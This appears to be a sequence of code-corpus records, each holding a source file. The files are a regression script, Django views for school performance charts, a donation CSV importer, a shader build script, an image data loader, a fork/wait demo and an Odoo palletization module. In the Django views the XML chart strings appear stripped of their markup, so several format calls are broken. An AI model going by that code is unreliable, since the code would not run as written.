sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train, y_train)\n\n\n# Predicting the test results\ny_pred = regressor.predict(x_test)\nprint(y_pred)\n\n\n# Building the optimal model using Backward Elimination\nimport statsmodels.formula.api as sm\n# When doing the Multiple Linear Regression above, the fact that x0=1 so that x0*b0 is\n# included in the regression was already done by the api\n# Here we need to add this ourselves\n# We add a column with 
1 to X (actually we create a matrix with 50 rows of int 1 and then\n# add the X matrix to that)\nx = np.append(arr=np.ones((50, 1)).astype(int), values=x, axis=1)\nprint(x)\n\n# First thing to do for Backwards Elimination is to create the Optimal Matrix of Features\n# which contains only the high impact independent variables\nx_opt = x[:, [0, 1, 2, 3, 4, 5]] # x_opt initialized with all 6 columns\n# We create a new regressor since this time we are using the sm library instead of\n# linear_model\nregressor_ols = sm.OLS(y, exog=x_opt).fit()\n\n# Next we look for the predictor with the highest p value (Step 3 in Backwards Elimination)\nprint(regressor_ols.summary())\n\n# We remove the columns with highest p value - column 2 0.99\nx_opt = x[:, [0, 1, 3, 4, 5]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n# We remove the columns with highest p value - column 1 0.94\nx_opt = x[:, [0, 3, 4, 5]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n# We remove the columns with highest p value - column 2 0.602\nx_opt = x[:, [0, 3, 5]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n# We remove the columns with highest p value - column 2 0.06\nx_opt = x[:, [0, 3]]\nregressor_ols = sm.OLS(endog=y, exog=x_opt).fit()\nregressor_ols.summary()\n\n","sub_path":"machine learning/01 Regression/02multiple_linear_regression.py","file_name":"02multiple_linear_regression.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"552577326","text":"# Create your views here.\nimport datetime\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\nfrom django.utils import simplejson\nfrom models import School,District,AYPDetail,AYPSummary\n\n\ndef display_ayp( request ):\n if \"district\" not in request.GET:\n district = \"SPRINGFIELD R-XII\"\n else:\n district = request.GET[\"district\"]\n\n districts = District.objects.filter( active = True ).order_by('name')\n\n return render_to_response( 'schools/ayp.html', { 'districts': districts, 'district': district }, context_instance = RequestContext( request ) )\n\ndef get_schools( request ):\n if \"school_type\" not in request.GET:\n school_type = \"high\"\n else:\n school_type = request.GET[\"school_type\"]\n\n if \"district\" not in request.GET:\n district = \"SPRINGFIELD R-XII\"\n else:\n district = request.GET[\"district\"]\n schools = School.objects.filter( district = District.objects.get( name= district ) ).order_by( 'school_type','name' )\n districts = District.objects.filter( active = True ).order_by('name')\n return render_to_response( 'schools/school_detail.html', {'schools': schools, 'district': district, 'districts': districts, 'school_name': schools[0].name }, context_instance = RequestContext( request ) )\n\ndef get_school_ayp_xml( request, district = None, school = None ):\n if district is None:\n district = \"SPRINGFIELD R-XII\"\n if school is None:\n if \"school\" not in request.GET:\n schools = School.objects.filter( district = District.objects.get( name = district ) )\n school = schools[0].name\n else:\n school = request.GET[\"school\"]\n school = School.objects.get( name = school, district = District.objects.get( name = district ) )\n details = AYPDetail.objects.filter( school = school ).order_by( \"year\" )\n\n chart_string 
= \"\"\n #chart_string += \"ETA6GP4F771O.945CWK-2XOI1X0-7L\"\n chart_string += \"line\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"2006\"\n chart_string += \"2007\"\n chart_string += \"2008\"\n chart_string += \"2009\"\n chart_string += \"2010\"\n chart_string += \"2011\"\n chart_string += \"\"\n\n #communication arts\n chart_string += \"\"\n chart_string += \"Communication Arts\"\n for detail in details:\n chart_string += \"%f\" % ( \"Communication Arts\", detail.comm_school_total )\n chart_string += \"\"\n \n #math\n chart_string += \"\"\n chart_string += \"Mathematics\"\n for detail in details:\n chart_string += \"%f\" % ( \"Mathematics\", detail.math_school_total )\n chart_string += \"\"\n \n #attendance\n chart_string += \"\"\n chart_string += \"Attendance\"\n for detail in details:\n chart_string += \"%f\" % (\"Attendance\", detail.attendance_pct )\n chart_string += \"\"\n \n if school.school_type == \"high\":\n #graduation\n chart_string += \"\"\n chart_string += \"Graduation\"\n for detail in details:\n chart_string += \"%f\" % (\"Graduation\", detail.graduation_pct )\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"%s\" % str(school).title()\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\n\n return HttpResponse( chart_string, content_type=\"application/xml\" )\n\ndef ayp_xml( request, school_type = None, district = None ):\n chart_string = \"\"\n #chart_string += \"ETA6GP4F771O.945CWK-2XOI1X0-7L\"\n chart_string += \"line\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"\"\n chart_string += \"2006\"\n chart_string += \"2007\"\n chart_string += \"2008\"\n chart_string += \"2009\"\n chart_string += \"2010\"\n chart_string += \"2011\"\n chart_string += \"\"\n #now our data\n if \"school_type\" in request.GET and request.GET[\"school_type\"]:\n schl_type = request.GET[\"school_type\"]\n else:\n schl_type = \"high\"\n if district is None:\n if \"district\" in request.GET:\n schools = School.objects.filter( district = District.objects.filter( name = request.GET[\"district\"].upper() ), active=True, school_type=schl_type )\n else:\n schools = School.objects.filter( district = District.objects.filter( name = \"SPRINGFIELD R-XII\" ), active= True, school_type=schl_type )\n else:\n schools = School.objects.all( school_type= \"high\", active= True )\n for school in schools:\n details = AYPDetail.objects.filter( school = school ).order_by( 'year' )\n chart_string += \"\"\n chart_string += \"%s\" % school.name\n for detail in details:\n if \"display_type\" in request.GET and request.GET[\"display_type\"]:\n if request.GET[\"display_type\"] == \"comm_arts\":\n if detail.comm_school_total is None:\n detail.comm_school_total = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.comm_school_total )\n elif request.GET[\"display_type\"] == \"math\":\n if detail.math_school_total is None:\n detail.math_school_total = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.math_school_total )\n elif request.GET[\"display_type\"] == \"attendance\":\n if detail.attendance_pct is None:\n detail.attendance_pct = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.attendance_pct )\n elif request.GET[\"display_type\"] == \"graduation\":\n if detail.graduation_pct is None:\n detail.graduation_pct = 0\n chart_string += \"%f\" % ( str( school.name ).title(), detail.graduation_pct )\n 
else:\n #default to comm_arts\n chart_string += \"%f\" % ( str( school.name ).title(), detail.comm_school_total )\n chart_string += \"\"\n #error code to make sure that something is shown\n if details is None or len( details ) == 0:\n chart_string +=\"No Data\"\n chart_string +=\"0\"; #2006\n chart_string +=\"0\"; #2007\n chart_string +=\"0\"; #2008\n chart_string +=\"0\"; #2009\n chart_string +=\"0\"; #2010\n chart_string +=\"0\"; #2011\n chart_string +=\"\"\n if \"display_type\" in request.GET:\n if request.GET[\"display_type\"] == \"comm_arts\":\n chart_lbl = \"Communication Arts\"\n elif request.GET[\"display_type\"] == \"math\":\n chart_lbl = \"Mathematics\"\n elif request.GET[\"display_type\"] == \"attendance\":\n chart_lbl = \"Attendance\"\n elif request.GET[\"display_type\"] == \"graduation\":\n chart_lbl = \"Graduation\"\n else:\n chart_lbl = \"Communication Arts\"\n #error code to make sure something is shown\n if schools is None or len( schools ) == 0:\n chart_string +=\"No School Found\"\n chart_string +=\"0\"; #2006\n chart_string +=\"0\"; #2007\n chart_string +=\"0\"; #2008\n chart_string +=\"0\"; #2009\n chart_string +=\"0\"; #2010\n chart_string +=\"0\"; #2011\n chart_string +=\"\"\n\n chart_string += \"\"\n chart_string += \"%s\" % chart_lbl\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\"\"\"\"\n chart_string += \"\"\n chart_string += \"\"\n return HttpResponse( chart_string, content_type='application/xml' )\n","sub_path":"schools/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"109305139","text":"from django.core.management.base import BaseCommand, CommandError\nimport csv\nfrom students.models import Student\nfrom schools.models import School\nfrom classes.models import Class\nfrom donors.models import Donor, Donor_log\nimport datetime \n\n\nclass Command(BaseCommand):\n\n\tdef add_arguments(self, parser):\n\t\tparser.add_argument('csv_file', nargs='+', type=str)\n\n\tdef handle(self, *args, **options):\n\t\tfor csv_file in options['csv_file']:\n\t\t\tdataReader = csv.reader(open(csv_file), delimiter=',', quotechar='\"')\n\t\t\tfor row in dataReader:\n\t\t\t\tdon = Donor_log()\n\t\t\t\t\n\t\t\t\tdon_name = Donor.objects.get(reg=row[0]) #first get school name\n\t\t\t\tdon.contact_name = don_name\n\t\t\t\tdon.donation_date = datetime.datetime.strptime(row[1], '%m/%d/%Y').date()\n\t\t\t\tdon.fiscal_year = row[2]\n\t\t\t\tdon.currency = row[3]\n\t\t\t\tdon.amount_local_currency = row[4]\n\t\t\t\tdon.conversion_rate_if_not_PKR = row[5]\n\t\t\t\tdon.amount_pkr = row[6]\n\t\t\t\tdon.donation_notes = row[7]\n\t\t\t\tdon.save()\n\t\t\t\tself.stdout.write(\n\t\t\t\t\t'Created donation {} {}'.format(don.contact_name, don.donation_date)\n\t\t\t\t)","sub_path":"src/donors/management/commands/import_donations.py","file_name":"import_donations.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"390348839","text":"# compiles_shaders.py\n#\n# runs shaders in shaders/raw through shaderc to produce\n# compiled shaders\n\nimport sys, os\nfrom os.path import join, isfile\n\ndx11cmd_fs = \"shadercRelease -f {} -o {} --type f -i common\\ --platform windows -p ps_4_0 -O 3\"\ndx11cmd_vs = \"shadercRelease -f {} -o {} --type v -i common\\ --platform windows -p vs_4_0 -O 3\"\n\ndx9cmd_fs = \"shadercRelease -f {} -o {} 
--type f -i common\\ --platform windows -p ps_3_0 -O 3\"\ndx9cmd_vs = \"shadercRelease -f {} -o {} --type v -i common\\ --platform windows -p vs_3_0 -O 3\"\n\nglcmd_fs = \"shadercRelease -f {} -o {} --type f -i common\\ --platform linux -p 120\"\nglcmd_vs = \"shadercRelease -f {} -o {} --type v -i common\\ --platform linux -p 120\"\n\ncmds_vs = [(dx11cmd_vs, \"dx11\"), (dx9cmd_vs, \"dx9\"), (glcmd_vs, \"glsl\")]\ncmds_fs = [(dx11cmd_fs, \"dx11\"), (dx9cmd_fs, \"dx9\"), (glcmd_fs, \"glsl\")]\n\ndef processFile(prefix, dirname, filename):\n print(\"Processing {}, {}, {}\".format(prefix, dirname, filename))\n\n cmds = []\n if prefix == \"vs\":\n cmds = cmds_vs\n elif prefix == \"fs\":\n cmds = cmds_fs\n else:\n print(\"Unknown prefix {}\".format(prefix))\n\n infile = join(dirname, filename)\n\n for (cmd, desttype) in cmds:\n outfile = join(\"..\", desttype, filename[0:-3] + \".bin\")\n fullcmd = cmd.format(infile, outfile)\n print(fullcmd)\n os.system(fullcmd)\n\ndef listdirs(dirname):\n allthings = [join(dirname, f) for f in os.listdir(dirname)]\n return [ f for f in allthings if not isfile(f) ]\n\ndef listfiles(dirname):\n allthings = os.listdir(dirname)\n return [ f for f in allthings if isfile(join(dirname, f)) ]\n\ndef main():\n dirs = listdirs(\".\")\n for dirname in dirs:\n files = listfiles(dirname)\n print(files)\n for filename in files:\n prefix = filename[0:2]\n suffix = filename[-3:]\n if suffix == \".sc\" and (prefix == \"vs\" or prefix == \"fs\"):\n processFile(prefix, dirname, filename)\n\nif __name__ == '__main__':\n main()\n","sub_path":"satellites/shaders/raw/compile_shaders.py","file_name":"compile_shaders.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34016987","text":"\"\"\"Class that is responsible for the loading and preprocessing of data.\n\"\"\"\nfrom sklearn.model_selection import train_test_split\n\nfrom src.base.base_data_loader import BaseDataLoader\nfrom src.dataloaders.data_generator import DataGen\nfrom src.utils import factory\n\n\nclass DataLoader(BaseDataLoader):\n def __init__(self, train_imgs_dir, train_masks_dir, test_imgs_dir, test_masks_dir,\n imgs_ext, masks_ext, masks_suffix, config):\n \"\"\" \n Args:\n train_imgs_dir (Path):\n train_masks_dir (Path):\n test_imgs_dir (Path):\n test_masks_dir (Path):\n imgs_ext (str): e.g. jpg\n masks_ext (str): e.g. 
png\n            masks_suffix (str):\n\n        config.data_loader requires:\n            img_shape ((height, width, channels)): \n            batch_size (int):\n        \"\"\"\n        super(DataLoader, self).__init__(config)\n\n        self.train_imgs_dir = train_imgs_dir\n        self.train_masks_dir = train_masks_dir\n        self.test_imgs_dir = test_imgs_dir\n        self.test_masks_dir = test_masks_dir\n        self.imgs_ext = imgs_ext\n        self.masks_ext = masks_ext\n        self.masks_suffix = masks_suffix\n\n        # Get train images file names\n        # Keep only .jpg files\n        train_img_paths = list(train_imgs_dir.glob(\"*.jpg\"))\n        # train_img_paths = list(train_imgs_dir.iterdir())\n        train_img_names = [p.stem for p in train_img_paths]\n\n        # Train/Val split\n        self.train_ids, self.val_ids = train_test_split(\n            train_img_names,\n            test_size=0.2,\n            random_state=42\n        )\n\n        # Get test images file names\n        # test_img_paths = list(test_imgs_dir.iterdir())\n        # self.test_ids = [p.stem for p in test_img_paths]\n\n        # Init default data generator\n\n    def get_train_datagen(self):\n        img_shape = self.config.data_loader.img_shape\n        batch_size = self.config.data_loader.batch_size\n        aug_name = self.config.data_loader.aug\n        # Import augmentation function wrapper\n        if aug_name:\n            # aug = factory.create(f'src.dataloaders.preprocess.{aug_name}')\n            aug = True\n        else:\n            aug = None\n        backbone = self.config.model.backbone\n\n        return DataGen(\n            self.train_ids,\n            self.train_imgs_dir,\n            self.train_masks_dir,\n            self.imgs_ext,\n            self.masks_ext,\n            self.masks_suffix,\n            backbone,\n            batch_size=batch_size,\n            img_shape=img_shape,\n            shuffle=True,\n            aug=aug\n        )\n\n    def get_val_datagen(self):\n        img_shape = self.config.data_loader.img_shape\n        batch_size = self.config.data_loader.batch_size\n        backbone = self.config.model.backbone\n\n        return DataGen(\n            self.val_ids,\n            self.train_imgs_dir,\n            self.train_masks_dir,\n            self.imgs_ext,\n            self.masks_ext,\n            self.masks_suffix,\n            backbone,\n            batch_size=batch_size,\n            img_shape=img_shape,\n            shuffle=False,\n            aug=None\n        )\n\n    def get_test_datagen(self):\n        img_shape = self.config.data_loader.img_shape\n        batch_size = self.config.data_loader.batch_size\n        backbone = self.config.model.backbone\n\n        return DataGen(\n            self.test_ids,\n            self.test_imgs_dir,\n            self.test_masks_dir,\n            self.imgs_ext,\n            self.masks_ext,\n            self.masks_suffix,\n            backbone,\n            batch_size=batch_size,\n            img_shape=img_shape,\n            shuffle=False,\n            aug=None\n        )\n\n    def create_test_datagen(self):\n        pass\n\n    def get_test_ids(self):\n        return self.test_ids\n","sub_path":"src/dataloaders/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"301500403","text":"import os \nfrom time import sleep \n\npid = os.fork()\n\nif pid < 0:\n    print(\"Error\")\nelif pid == 0:\n    sleep(3)\n    print(\"Child %d process exit\"%os.getpid())\n    os._exit(2)\nelse:\n    # pid,status = os.wait()\n    # non-blocking mode\n    pid,status = os.waitpid(-1,os.WNOHANG)\n    print(\"pid:\",pid)\n    # get the child process's exit status\n    print(\"status:\",os.WEXITSTATUS(status))\n    while True:\n        sleep(100)","sub_path":"Pythonnet/codeandnote/day5/wait.py","file_name":"wait.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"128955366","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass HubiPalletization(models.Model):\n    _name = 'hubi.palletization'\n    _description = \"Palletization\"\n    _order = 'name'\n    \n    def _get_qty(self):\n        return (self.uom_qty or 0) - (self.pallet_qty or 0)\n    \n    def 
_get_default_company_id(self):\n #return self._context.get('force_company', self.env.user.company_id.id)\n return self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n \n \n name = fields.Char(string='Name', required=True)\n company_id = fields.Many2one('res.company', string='Company', default=_get_default_company_id, required=True)\n order_id = fields.Many2one('sale.order', string='Order Reference', required=True)\n product_id = fields.Many2one('product.product', string='Product', required=True)\n default_pallet_qty = fields.Float(string='Default Quantity on the Pallet')\n uom_qty = fields.Float(string='Order Quantity')\n pallet_qty = fields.Float(string='Quantity on the Pallet')\n residual_qty = fields.Float(string='Residual Quantity', compute='_residual_qty')\n input_pallet_id = fields.Many2one('hubi.palletization.line', string='Complete No Pallet')\n #input_pallet_id = fields.Many2one('hubi.palletization.line', string='Complete No Pallet', domain=\"[('order_id', '=', order_id)]\")\n \n input_qty = fields.Float(string='Complete Quantity', default=_get_qty)\n \n \n #@api.onchange('default_pallet_qty')\n #def onchange_order_id(self):\n # res = {}\n # if self.order_id:\n # order_number = self._context.get('active_id')\n # res['domain'] = {'input_pallet_id': [('order_id', '=', order_number)]}\n # return res\n\n #@api.one\n def _default_qty(self):\n self.default_pallet_qty = self.product_id.default_pallet_qty\n \n #@api.one\n def _residual_qty(self):\n #qty_p = self.pallet_qty or 0\n #qty_o = self.uom_qty or 0\n #pallet_line=self.env['hubi.palletization'].search([('order_line_id','=', self.id)])\n #for line in pallet_line:\n # if line.quantity :\n # qty_p = line.quantity\n \n self.residual_qty = (self.uom_qty or 0) - (self.pallet_qty or 0)\n\n def new_pallet(self):\n self.env.cr.commit() \n \n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n id_order = self.order_id.id\n \n max_qty = self.default_pallet_qty\n if self.residual_qty != 0 and max_qty > 0:\n # Find the last pallet\n no_pallet = 0\n query_args = {'id_order' : id_order, 'company_code' : company_code}\n query = \"\"\"SELECT pallet_no FROM hubi_palletization_line \n WHERE order_id=%(id_order)s and company_id=%(company_code)s \n order by pallet_no desc LIMIT 1\"\"\"\n\n self.env.cr.execute(query, query_args)\n ids = [(r[0]) for r in self.env.cr.fetchall()]\n \n for last_no in ids:\n no_pallet=last_no \n \n reste = self.residual_qty\n qty_a_pl= self.residual_qty\n new_qty_pallet = self.pallet_qty + self.residual_qty\n \n palletization_line_ids = self.env['hubi.palletization.line'].search([('palletization_id', '=', self.id), ('company_id', '=', company_code)])\n if (not palletization_line_ids) or (qty_a_pl != 0):\n qty = 0\n \n if max_qty > 0:\n while qty_a_pl !=0:\n if qty_a_pl >= max_qty:\n qty = max_qty\n reste = qty_a_pl - max_qty\n else:\n qty = qty_a_pl\n reste = 0\n \n qty_a_pl = reste\n no_pallet += 1\n \n # Create palletization line\n # 'company_id': self._context.get('force_company', self.env.user.company_id.id),\n name_line = ('Order : %s / Pallet : %s') % (self.order_id.id,no_pallet)\n pallet_line_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'palletization_id':self.id,\n 'order_id': self.order_id.id,\n 'product_id': self.product_id.id,\n 'quantity': qty,\n 'pallet_no': 
no_pallet,\n \n }\n palletization_line = self.env['hubi.palletization.line'].create(pallet_line_vals) \n \n # Update pallet_qty on hubi_palletization\n self._cr.execute(\"UPDATE hubi_palletization set pallet_qty = %s, input_qty = %s WHERE id=%s \", (new_qty_pallet, reste, self.id))\n self.env.cr.commit()\n \n def complete_pallet(self):\n self.env.cr.commit() \n \n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n id_order = self.order_id.id\n \n max_qty = self.default_pallet_qty\n no_pallet = self.input_pallet_id.pallet_no\n no_product = self.product_id.id\n \n if self.input_qty != 0 and self.input_pallet_id != 0 and self.residual_qty != 0 and max_qty > 0:\n if self.input_qty > self.residual_qty:\n qty_a_pl = self.residual_qty\n else: \n qty_a_pl = self.input_qty \n \n new_qty_pallet = self.pallet_qty + qty_a_pl \n reste = self.residual_qty - qty_a_pl\n \n # Update pallet_qty on hubi_palletization\n self._cr.execute(\"UPDATE hubi_palletization set pallet_qty = %s, input_qty = %s, input_pallet_id= null WHERE id=%s \", (new_qty_pallet, reste, self.id))\n \n \n # Find the line in hubi_palletization_line for this pallet_id and this product_id\n palletization_line_ids = self.env['hubi.palletization.line'].search([('palletization_id', '=', self.id), ('pallet_no', '=', no_pallet), ('product_id', '=', no_product), ('company_id', '=', company_code) ])\n if (not palletization_line_ids):\n # Create palletization line\n name_line = ('Order : %s / Pallet : %s') % (self.order_id.id, no_pallet)\n pallet_line_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'palletization_id':self.id,\n 'order_id': self.order_id.id,\n 'product_id': no_product,\n 'quantity': qty_a_pl,\n 'pallet_no': no_pallet,\n }\n palletization_line = self.env['hubi.palletization.line'].create(pallet_line_vals) \n else:\n # Update quantity on hubi_palletization_line\n new_qty = palletization_line_ids.quantity + qty_a_pl \n self._cr.execute(\"UPDATE hubi_palletization_line set quantity = %s WHERE palletization_id=%s and pallet_no=%s and product_id=%s and company_id=%s \", \n (new_qty, self.id, no_pallet, no_product, company_code))\n\n self.env.cr.commit() \n\n \n \n #@api.model\n #def get(self, name, model, res_id=False):\n # domain = self._get_domain(name, model)\n # if domain is not None:\n # domain = [('res_id', '=', res_id)] + domain\n # order_number = self._context.get('active_id')\n # res['domain'] = {'input_pallet_id': [('order_id', '=', order_number)]}\n #make the search with company_id asc to make sure that properties specific to a company are given first\n #prop = self.search(domain, limit=1, order='company_id')\n #if prop:\n # return prop.get_by_record()\n # return False\n\n #def _get_domain(self, prop_name, model):\n #self._cr.execute(\"SELECT id FROM ir_model_fields WHERE name=%s AND model=%s\", (prop_name, model))\n #res = self._cr.fetchone()\n #if not res:\n # return None\n #company_id = self._context.get('force_company') or self.env['res.company']._company_default_get(model, res[0]).id\n #return [('fields_id', '=', res[0]), ('company_id', 'in', [company_id, False])]\n #res = {}\n #if self.order_id:\n # order_number = self._context.get('active_id')\n # res['domain'] = {'input_pallet_id': [('order_id', '=', order_number)]}\n #return res\n \n \nclass HubiPalletizationLine(models.Model):\n _name = 
\"hubi.palletization.line\"\n _description = \"Palletization Line\"\n _order = 'name'\n \n def _get_default_company_id(self):\n #return self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('force_company', self.env.user.company_id.id)\n return self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n \n name = fields.Char(string='Name', required=True)\n company_id = fields.Many2one('res.company', string='Company', default=_get_default_company_id, required=True)\n palletization_id = fields.Many2one('hubi.palletization', string='Palletization Reference', required=True)\n #order_id = fields.Char(string='sale.order')\n order_id = fields.Many2one('sale.order', string='Order Reference', required=True)\n pallet_no = fields.Integer(string='Pallet Number')\n product_id = fields.Many2one('product.product', string='Product', required=True)\n quantity = fields.Float(string='Quantity on the Pallet')\n\n def delete_pallet(self):\n self.env.cr.commit() \n\n # delete in hubi.palletization.line\n #company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.order_id.id)]).company_id.id\n id_order = self.order_id.id\n\n qty = self.quantity\n palletization_id = self.palletization_id.id\n no_pallet_supp = self.pallet_no\n order_id = self.order_id.id\n no_product = self.product_id.id\n \n self._cr.execute(\"DELETE FROM hubi_palletization_line WHERE id=%s \", (self.id,))\n \n # update in hubi.palletization : pallet_qty\n palletization_ids = self.env['hubi.palletization'].search([('id', '=', palletization_id)])\n if (palletization_ids) :\n qty_p =(palletization_ids.pallet_qty or 0) - qty\n qty_r =(palletization_ids.uom_qty or 0) - (qty_p or 0)\n #palletization_ids.write({\"pallet_qty\":[(4, qty_p)]})\n palletization_ids.write({'pallet_qty': qty_p})\n palletization_ids.write({'input_qty': qty_r})\n \n \n #new_no_pallet = no_pallet_supp\n \n no_pallet_exist = False\n pallets = self.env['hubi.palletization.line'].search([('order_id', '=', order_id), ('company_id', '=', company_code), ('pallet_no', '=', no_pallet_supp)] , order='pallet_no asc')\n for pallet in pallets:\n no_pallet_exist = True\n \n if (not no_pallet_exist):\n # rename No pallet : \n pallets = self.env['hubi.palletization.line'].search([('order_id', '=', order_id), ('company_id', '=', company_code), ('pallet_no', '>=', no_pallet_supp)] , order='pallet_no asc')\n for pallet in pallets:\n new_no_pallet = pallet.pallet_no\n if (pallet.pallet_no == 1):\n new_no_pallet = 1\n else: \n new_no_pallet = new_no_pallet - 1\n name_line = ('Order : %s / Pallet : %s') % (order_id, new_no_pallet)\n pallet.write({'name': name_line, 'pallet_no': new_no_pallet})\n \n #new_no_pallet += 1\n \n self.env.cr.commit()\n \n \nclass HubiProductPalletization(models.Model):\n _inherit = \"product.template\"\n\n pallet_description = fields.Char(string='Pallet Description') \n default_pallet_qty = fields.Float(string='Default Quantity on the Pallet')\n\nclass HubiSaleOrderPalletization(models.Model):\n _inherit = \"sale.order\"\n\n palletization_ids = fields.One2many('hubi.palletization', 'order_id', string='Palletization Lines', copy=True, auto_join=True)\n palletization_line_ids = fields.One2many('hubi.palletization.line', 'order_id', string='Palletization Pallets')\n\n def create_pallet(self):\n self.env.cr.commit()\n # Find the last pallet\n #company_code = 
self.env['sale.order'].search([('id', '=', self.id)]).company_id.id or self._context.get('company_id') or self.env['res.users']._get_company().id\n company_code = self.env['sale.order'].search([('id', '=', self.id)]).company_id.id\n id_order = self.id\n\n no_pallet = 0\n query_args = {'id_order' : id_order, 'company_code' : company_code}\n query = \"\"\"SELECT pallet_no FROM hubi_palletization_line \n WHERE order_id=%(id_order)s and company_id=%(company_code)s \n order by pallet_no desc LIMIT 1\"\"\"\n\n self.env.cr.execute(query, query_args)\n ids = [(r[0]) for r in self.env.cr.fetchall()]\n \n for last_no in ids:\n no_pallet=last_no \n \n # Update pallet_qty on hubi_palletization\n\n # Find the sale.order.line\n query=\"\"\"SELECT order_id, product_id,\n coalesce(product_template.default_pallet_qty,0) AS default_pallet_qty,\n sum(product_uom_qty) AS uom_qty \n FROM sale_order_line \n inner join product_product on product_id = product_product.id\n inner join product_template on product_template.id = product_product.product_tmpl_id\n where order_id = %(id_order)s and sale_order_line.company_id=%(company_code)s \n group by order_id, product_id,\n product_template.default_pallet_qty\n order by order_id, product_id\"\"\" \n\n self.env.cr.execute(query, query_args)\n ids = [(r[0],r[1],r[2],r[3]) for r in self.env.cr.fetchall()]\n \n for order_id, prod_id, max_qty, uom_qty in ids:\n if max_qty >0:\n palletization_ids = self.env['hubi.palletization'].search([('order_id', '=', order_id), ('product_id', '=', prod_id), ('company_id', '=', company_code)])\n if not palletization_ids:\n # Create palletization \n name_line = ('Order : %s ') % (order_id)\n pallet_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'order_id': order_id,\n 'product_id': prod_id,\n 'uom_qty': uom_qty,\n 'default_pallet_qty': max_qty,\n 'pallet_qty': 0,\n }\n palletization = self.env['hubi.palletization'].create(pallet_vals) \n else:\n query_maj = \"\"\"UPDATE hubi_palletization set uom_qty = %s, default_pallet_qty = %s \n WHERE order_id=%s AND product_id=%s and company_id=%s \"\"\"\n self._cr.execute(query_maj, (uom_qty, max_qty, order_id, prod_id, company_code))\n self.env.cr.commit()\n \n \n # Create palletization line \n query=\"\"\"SELECT id, order_id, product_id,\n coalesce(default_pallet_qty,0) AS default_pallet_qty,\n coalesce(uom_qty,0) AS uom_qty,\n coalesce(pallet_qty,0) AS pallet_qty \n FROM hubi_palletization\n where order_id = %(id_order)s and company_id=%(company_code)s \n order by order_id, product_id\"\"\" \n\n self.env.cr.execute(query, query_args)\n ids = [(r[0],r[1],r[2],r[3],r[4],r[5]) for r in self.env.cr.fetchall()]\n \n for palletization_id, order_id, prod_id, max_qty, uom_qty, pallet_qty in ids:\n reste = uom_qty - pallet_qty\n qty_a_pl= uom_qty - pallet_qty\n \n palletization_line_ids = self.env['hubi.palletization.line'].search([('palletization_id', '=', palletization_id), ('company_id', '=', company_code)])\n if (not palletization_line_ids) or (qty_a_pl != 0):\n qty = 0\n \n if max_qty > 0:\n while qty_a_pl !=0:\n if qty_a_pl >= max_qty:\n qty = max_qty\n reste = qty_a_pl - max_qty\n else:\n qty = qty_a_pl\n reste = 0\n \n qty_a_pl = reste\n no_pallet += 1\n \n # Create palletization line\n name_line = ('Order : %s / Pallet : %s') % (order_id, no_pallet)\n pallet_line_vals = {\n 'name': name_line,\n 'company_id': company_code,\n 'palletization_id': palletization_id,\n 'order_id': order_id,\n 'product_id': prod_id,\n 'quantity': qty,\n 'pallet_no': no_pallet,\n \n }\n palletization_line 
